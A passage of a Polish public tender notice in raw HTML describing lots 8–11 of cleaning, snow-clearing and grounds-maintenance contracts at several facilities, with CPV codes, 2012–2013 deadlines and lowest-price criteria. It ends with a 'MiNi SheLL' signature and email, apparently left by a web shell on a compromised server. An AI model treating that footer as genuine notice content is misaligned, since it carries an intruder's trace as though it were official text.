Pielęgnacja krzewów (cięcie wg określonej formy, nawożenie, wywóz odpadów zebranych podczas pielęgnacji itp.) (maj, wrzesień), Koszenie trawy, wywóz odpadów zebranych podczas koszenia (w maju, czerwcu, lipcu, sierpniu
i wrześniu), Koszenie trawy, wywóz odpadów zebranych podczas koszenia (w maju, lipcu i wrześniu), Grabienie liści, wywóz odpadów zebranych podczas grabienia (kwiecień, październik, listopad)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.91.12.00-8, 90.91.92.00-4, 90.61.00.00-6, 90.62.00.00-9, 90.63.00.00-2, 77.34.20.00-9, 77.31.41.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Świadczenie usług w zakresie kompleksowego utrzymania czystości w Kompleksach w Opolu ul. Domańskiego 68 bud. nr 14 oraz ul. Niemodlińska 88   bud. nr 2 - klauzula ZASTRZEŻONE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Prace, jakie Wykonawca będzie wykonywał w obiektach o powierzchni (poziomej):
1.Zamiatanie powierzchni podłogowych klatek schodowych, korytarzy, pomieszczeń biurowych, gospodarczych, sanitarnych.
2.Opróżnianie i mycie koszy na śmieci, wymiana worków na śmieci.
3.Wycieranie kurzu i zabrudzeń: z mebli, sprzętu biurowego, parapetów, luster, boazerii, paneli ściennych, grzejników, drzwi, lamperii, płytek ściennych itp. ( w tym, również usuwanie pajęczyn w pomieszczeniach, na korytarzach i klatkach schodowych)
4.Odkurzanie wykładzin dywanowych, dywanów..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.91.12.00-8, 90.91.92.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 10.10.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Świadczenie usług w zakresie kompleksowego utrzymania czystości w Kompleksie w Bolesławcu ul. Wojska Polskiego 54.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Prace, jakie Wykonawca będzie wykonywał w obiektach o powierzchni (poziomej):
1.Zamiatanie powierzchni podłogowych klatek schodowych, korytarzy, pomieszczeń biurowych, gospodarczych, sanitarnych.
2.Opróżnianie i mycie koszy na śmieci, wymiana worków na śmieci.
3.Wycieranie kurzu i zabrudzeń: z mebli, sprzętu biurowego, parapetów, luster, boazerii, paneli ściennych, grzejników, drzwi, lamperii, płytek ściennych itp. ( w tym, również usuwanie pajęczyn w pomieszczeniach, na korytarzach i klatkach schodowych)
4.Odkurzanie wykładzin dywanowych, dywanów..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.91.12.00-8, 90.91.92.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 10.10.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Świadczenie usług w zakresie kompleksowego utrzymania czystości w Kompleksie Jastrzębie Ambulatorium bud. nr 3.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Prace, jakie Wykonawca będzie wykonywał w obiektach o powierzchni (poziomej):
1.Zamiatanie powierzchni podłogowych klatek schodowych, korytarzy, pomieszczeń biurowych, gospodarczych, sanitarnych.
2.Opróżnianie i mycie koszy na śmieci, wymiana worków na śmieci.
3.Wycieranie kurzu i zabrudzeń: z mebli, sprzętu biurowego, parapetów, luster, boazerii, paneli ściennych, grzejników, drzwi, lamperii, płytek ściennych itp. ( w tym, również usuwanie pajęczyn w pomieszczeniach, na korytarzach i klatkach schodowych)
4.Odkurzanie wykładzin dywanowych, dywanów..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.91.12.00-8, 90.91.92.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 24.01.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Świadczenie usług w zakresie kompleksowego utrzymania czystości w Kompleksie WKU bud. nr 1 w Kędzierzyn- Koźle ul. Łukasiewicza 11.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Prace, jakie Wykonawca będzie wykonywał w obiektach o powierzchni (poziomej):
1.Zamiatanie powierzchni podłogowych klatek schodowych, korytarzy, pomieszczeń biurowych, gospodarczych, sanitarnych.
2.Opróżnianie i mycie koszy na śmieci, wymiana worków na śmieci.
3.Wycieranie kurzu i zabrudzeń: z mebli, sprzętu biurowego, parapetów, luster, boazerii, paneli ściennych, grzejników, drzwi, lamperii, płytek ściennych itp. ( w tym, również usuwanie pajęczyn w pomieszczeniach, na korytarzach i klatkach schodowych).
4.Odkurzanie wykładzin dywanowych, dywanów.
2. Utrzymanie czystości na terenowych obiektach utwardzonych:
W zależności od warunków atmosferycznych: Czyszczenie i zamiatanie dróg, chodników, placów oraz chodników przyległych do terenu (w tym czyszczenie poboczy przy krawężnikach z zanieczyszczeń, chwastów i śmieci), wywóz zebranych podczas sprzątania nieczystości lub: Odśnieżanie, posypywanie piaskiem i środkami rozpuszczającymi śnieg i lód (zgodnie z obowiązującymi przepisami) ciągów komunikacyjnych, wejść do budynków, schodów itp. oraz wywóz śniegu- wg. potrzeb, określonych przez Kierownika WAK.
3. Utrzymanie terenów zielonych:
Pielęgnacja trawników i rabatów kwiatowych (koszenie, grabienie, pielenie chwastów, wywóz odpadów zebranych podczas pielęgnacji np.podlewanie - wg. potrzeb. Koszenie trawy, wywóz odpadów zebranych podczas koszenia. Grabienie liści, wywóz odpadów zebranych podczas grabienia.
4. Odśnieżanie dachów płaskich i czyszczenie rynien dachowych i rur spustowych: 
Odśnieżanie, dachów płaskich-w przypadku wystąpienia takiej potrzeby, na zgłoszenie Kierownika WAK. Usuwanie sopli lodowych - wg potrzeb.
Czyszczenie rynien dachowych i rur spustowych -w przypadku wystąpienia takiej potrzeby, na zgłoszenie Kierownika WAK..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.91.12.00-8, 90.91.92.00-4, 90.61.00.00-6, 90.62.00.00-9, 90.63.00.00-2, 77.34.20.00-9, 77.31.41.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com